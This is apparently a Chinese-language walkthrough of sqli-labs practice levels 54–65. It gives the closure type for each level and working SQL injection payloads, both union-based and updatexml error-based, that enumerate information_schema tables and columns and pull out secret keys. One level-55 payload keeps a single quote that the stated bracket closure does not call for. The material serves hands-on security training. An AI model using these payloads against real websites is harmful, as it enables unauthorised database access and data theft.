sql-54

翻譯一下頁面，得知我們只有十次機會。id參數是單引號閉合。

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ 

我得到的表名是igsyiz2p7z。（每個人得到的應該都不一樣，所以后面的代碼要改一下）

?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='igsyiz2p7z'--+

?id=-1' union select 1,group_concat(secret_0GZU),3 from igsyiz2p7z--+ 

這樣就得到我們的key值了，提交了即可。

sql-55

這關有14次機會，id是括號閉合。

?id=-1) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ 

?id=-1) union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='jsoh4368gx'--+

?id=-1' union select 1,group_concat(secret_D93I),3 from jsoh4368gx--+ 

sql-56

14次機會，’）閉合。跟前兩關類似，在這里就不寫步驟了。

sql-57

雙引號閉合，跟上面幾關一樣。

sql-58

這關少于五次的機會，單引號閉合。使用報錯注入即可。

?id=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1) --+
?id=1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='kecj1r7f3t')),3)--+
?id=1' and updatexml(1,concat(1,(select group_concat(secret_8HG4) from kecj1r7f3t )),3) --+

sql-59

這關是整數型，方法跟上一關一樣。

sql-60

閉合類型是")，方法跟前兩關一樣。

sql-61

閉合類型是'))，方法同上。

sql-62

閉合類型是單引號加括號。沒有報錯信息，聯合注入也沒有注入點，所以這關只能使用布爾盲注或時間盲注，具體步驟可以看

時間盲注：Blind- Time based-Single Quotes-String--SQL注入-CSDN博客

布爾盲注：Blind-Boolian-Single Quotes-String--SQL注入-CSDN博客

sql-63

單引號閉合，方法同上。

sql-64

閉合類型是))，方法同上。

sql-65

閉合類型是")，方法同上。

總結

? ? ? ?sql全部關卡到這就結束了，總結一下方法有：聯合注入，報錯注入，堆疊注入，時間盲注，布爾盲注，寬字節注入，外帶注入，頭部注入，二次注入，外帶注入。通過實踐練習可以更好地掌握這些注入技術。